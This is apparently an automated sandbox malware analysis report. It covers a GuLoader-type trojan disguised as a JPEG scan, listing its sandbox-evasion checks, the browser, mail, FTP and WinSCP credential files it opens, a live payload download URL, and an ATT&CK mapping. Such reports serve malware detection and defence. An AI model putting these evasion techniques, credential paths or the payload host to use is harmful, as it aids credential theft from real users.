Code function: 2_2_6DDA1A9C GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

2_2_6DDA1A9C

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 2_2_6DDA2F20 push eax; ret	2_2_6DDA2F4E
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_359AB9E3 push FAF8B93Ch; ret	4_2_359AB9E9
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_359ABBF6 push FAF8B93Ch; ret	4_2_359ABBFF
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_359ABB44 push FAF8B93Ch; ret	4_2_359ABB4D
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_359ABA95 push FAF8B93Ch; ret	4_2_359ABA9B
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_359ABAEB push FAF8B93Ch; ret	4_2_359ABAF4

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	File created: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\nsDialogs.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	File created: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	File created: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\BgImage.dll	Jump to dropped file

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Check if machine is in data center or colocation facility

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Windows\System32\dllhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Memory allocated: 110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Memory allocated: 33840000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Memory allocated: 33300000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\nsDialogs.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll	Jump to dropped file
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\BgImage.dll	Jump to dropped file

Source: C:\Windows\System32\dllhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard

Source: C:\Windows\System32\dllhost.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 2_2_0040626D FindFirstFileA,FindClose,	2_2_0040626D
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 2_2_00405732 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	2_2_00405732
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 2_2_004026FE FindFirstFileA,	2_2_004026FE
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_0040626D FindFirstFileA,FindClose,	4_2_0040626D
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_00405732 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,	4_2_00405732
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Code function: 4_2_004026FE FindFirstFileA,	4_2_004026FE

Source: jpgcamscanner_20240521_0072345_JPEG.bat.exe, 00000004.00000002.24162722819.0000000002FD6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWM
Source: jpgcamscanner_20240521_0072345_JPEG.bat.exe, 00000004.00000002.24162722819.0000000002F78000.00000004.00000020.00020000.00000000.sdmp, jpgcamscanner_20240521_0072345_JPEG.bat.exe, 00000004.00000002.24162722819.0000000002FD6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	API call chain: ExitProcess graph end node			graph_2-4668
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	API call chain: ExitProcess graph end node			graph_2-4826

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe

Code function: 2_2_6DDA1A9C GlobalAlloc,lstrcpyA,lstrcpyA,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyA,GetModuleHandleA,LoadLibraryA,GetProcAddress,lstrlenA,

2_2_6DDA1A9C

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe

Memory allocated: page read and write | page guard

Jump to behavior

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe

Process created: C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Jump to behavior

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Queries volume information: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation			Jump to behavior

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe

Code function: 2_2_004031D6 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

2_2_004031D6

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini	Jump to behavior

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe

File opened: C:\FTP Navigator\Ftplist.txt

Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles	Jump to behavior
Source: C:\Users\user\Desktop\jpgcamscanner_20240521_0072345_JPEG.bat.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities	Jump to behavior

Source: Yara match	File source: 00000004.00000002.24172966883.0000000033875000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: jpgcamscanner_20240521_0072345_JPEG.bat.exe PID: 7232, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 Access Token Manipulation	12 Virtualization/Sandbox Evasion	2 OS Credential Dumping	211 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Native API	Boot or Logon Initialization Scripts	11 Process Injection	1 Disable or Modify Tools	1 Credentials in Registry	12 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	1 Access Token Manipulation	Security Account Manager	1 System Network Configuration Discovery	SMB/Windows Admin Shares	2 Data from Local System	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	11 Process Injection	NTDS	2 File and Directory Discovery	Distributed Component Object Model	1 Clipboard Data	12 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	26 System Information Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	2 Obfuscated Files or Information	Cached Domain Credentials	Wi-Fi Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
jpgcamscanner_20240521_0072345_JPEG.bat.exe	34%	ReversingLabs	Win32.Trojan.Guloader
jpgcamscanner_20240521_0072345_JPEG.bat.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner
C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\BgImage.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\System.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsm54DF.tmp\nsDialogs.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
http://ip-api.com/line/?fields=hosting	0%	Avira URL Cloud	safe
http://nsis.sf.net/NSIS_Error	0%	Avira URL Cloud	safe
http://nsis.sf.net/NSIS_ErrorError	0%	Avira URL Cloud	safe
http://ip-api.com	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	Avira URL Cloud	safe
http://veysiseker.com/FOB.bin	100%	Avira URL Cloud	malware

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ip-api.com	208.95.112.1	true	true		unknown
veysiseker.com	192.250.227.27	true	false		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://veysiseker.com/FOB.bin	false	Avira URL Cloud: malware	unknown
http://ip-api.com/line/?fields=hosting	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://nsis.sf.net/NSIS_Error	jpgcamscanner_20240521_0072345_JPEG.bat.exe	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	jpgcamscanner_20240521_0072345_JPEG.bat.exe	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	jpgcamscanner_20240521_0072345_JPEG.bat.exe, 00000004.00000002.24172966883.0000000033841000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://ip-api.com	jpgcamscanner_20240521_0072345_JPEG.bat.exe, 00000004.00000002.24172966883.0000000033841000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
192.250.227.27	veysiseker.com	United States		36454	CNSV-LLCUS	false
208.95.112.1	ip-api.com	United States		53334	TUT-ASUS	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1445937
Start date and time:	2024-05-22 20:12:27 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 21s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	jpgcamscanner_20240521_0072345_JPEG.bat.exe
Detection:	MAL
Classification:	mal92.troj.spyw.evad.winEXE@4/18@2/2
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 94% Number of executed functions: 138 Number of non-executed functions: 71
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): RuntimeBroker.exe, backgroundTaskHost.exe
Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
Execution Graph export aborted for target jpgcamscanner_20240521_0072345_JPEG.bat.exe, PID 7232 because it is empty
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
VT rate limit hit for: jpgcamscanner_20240521_0072345_JPEG.bat.exe

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
208.95.112.1	h0pYN6vLWWE9A1c.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	DkJr5Ana0qQ1M3U.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	rTTSWIFT_8374783.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	FMC Order No22052468.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	Wire Transfer Payment Copy #18-05-2024.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	DA14680-01F08A92 24K.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	SKIIP 83EC125T1 22-0-05-24RQ.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	ip-api.com/line/?fields=hosting
	Swift scan.exe	Get hash	malicious	AgentTesla	Browse	ip-api.com/line/?fields=hosting
	New Voicemail Invoice 64746w .js	Get hash	malicious	WSHRAT	Browse	ip-api.com/json/
	gtKVgxrJ22.exe	Get hash	malicious	Gurcu Stealer, WhiteSnake Stealer	Browse	ip-api.com/line?fields=query,country

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ip-api.com	https://link.mail.beehiiv.com/ss/c/u001.CEz1YkosQOgW_2I8tJTUL2rOicXJM7RxHjhrRWDeG5g4TuF3JnRWze3ceZ9WwqET/46i/a2N64yc5RA-IsZ3qpS7tjQ/h6/h001.j_JgYHgZoY9wighPNvNrp_oY-YX91EMEgYGT_rGLcUU	Get hash	malicious	Unknown	Browse	51.77.64.70
	h0pYN6vLWWE9A1c.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	DkJr5Ana0qQ1M3U.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	rTTSWIFT_8374783.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	https://www.bing.com/ck/a?!&&p=8ea437cdae831bffJmltdHM9MTcxNTQ3MjAwMCZpZ3VpZD0wZTZlYTYzMC1mOTliLTY4ZWUtMmFlZS1iNWJmZjhiYzY5NDUmaW5zaWQ9NTIwNw&ptn=3&ver=2&hsh=3&fclid=0e6ea630-f99b-68ee-2aee-b5bff8bc6945&psq=yamamotokota.com&u=a1aHR0cHM6Ly95YW1hbW90b2tvdGEuY29tL0hPTUU#ZHVuY2FuLnJlYWRAam9obmxld2lzLmNvLnVr	Get hash	malicious	Unknown	Browse	51.77.64.70
	https://www.bing.com/ck/a?!&&p=8ea437cdae831bffJmltdHM9MTcxNTQ3MjAwMCZpZ3VpZD0wZTZlYTYzMC1mOTliLTY4ZWUtMmFlZS1iNWJmZjhiYzY5NDUmaW5zaWQ9NTIwNw&ptn=3&ver=2&hsh=3&fclid=0e6ea630-f99b-68ee-2aee-b5bff8bc6945&psq=yamamotokota.com&u=a1aHR0cHM6Ly95YW1hbW90b2tvdGEuY29tL0hPTUU#ZHVuY2FuLnJlYWRAam9obmxld2lzLmNvLnVr	Get hash	malicious	Unknown	Browse	51.77.64.70
	FMC Order No22052468.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Wire Transfer Payment Copy #18-05-2024.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	DA14680-01F08A92 24K.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	SKIIP 83EC125T1 22-0-05-24RQ.vbs	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CNSV-LLCUS	quotation.doc	Get hash	malicious	Unknown	Browse	192.250.227.28
	z8s945rPmZ.exe	Get hash	malicious	SystemBC	Browse	192.250.234.71
	SecuriteInfo.com.Exploit.CVE-2017-11882.123.30974.7732.rtf	Get hash	malicious	AgentTesla	Browse	192.250.227.28
	yZcecBUXN7.exe	Get hash	malicious	FormBook	Browse	192.250.235.36
	EMPLOYEE-FINAL-SETTLEMENTS.doc	Get hash	malicious	FormBook	Browse	192.250.235.36
	n5CCcrkB0Q.exe	Get hash	malicious	FormBook	Browse	192.250.235.36
	tee030.doc	Get hash	malicious	FormBook	Browse	192.250.235.36
	http://www.greenmetrocars.co.uk/	Get hash	malicious	Unknown	Browse	192.250.227.23
	https://domesticasia.com/	Get hash	malicious	Unknown	Browse	192.250.235.41
	3nDJFXklMW.elf	Get hash	malicious	Gafgyt, Mirai	Browse	192.250.254.165
TUT-ASUS	h0pYN6vLWWE9A1c.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	DkJr5Ana0qQ1M3U.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	rTTSWIFT_8374783.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
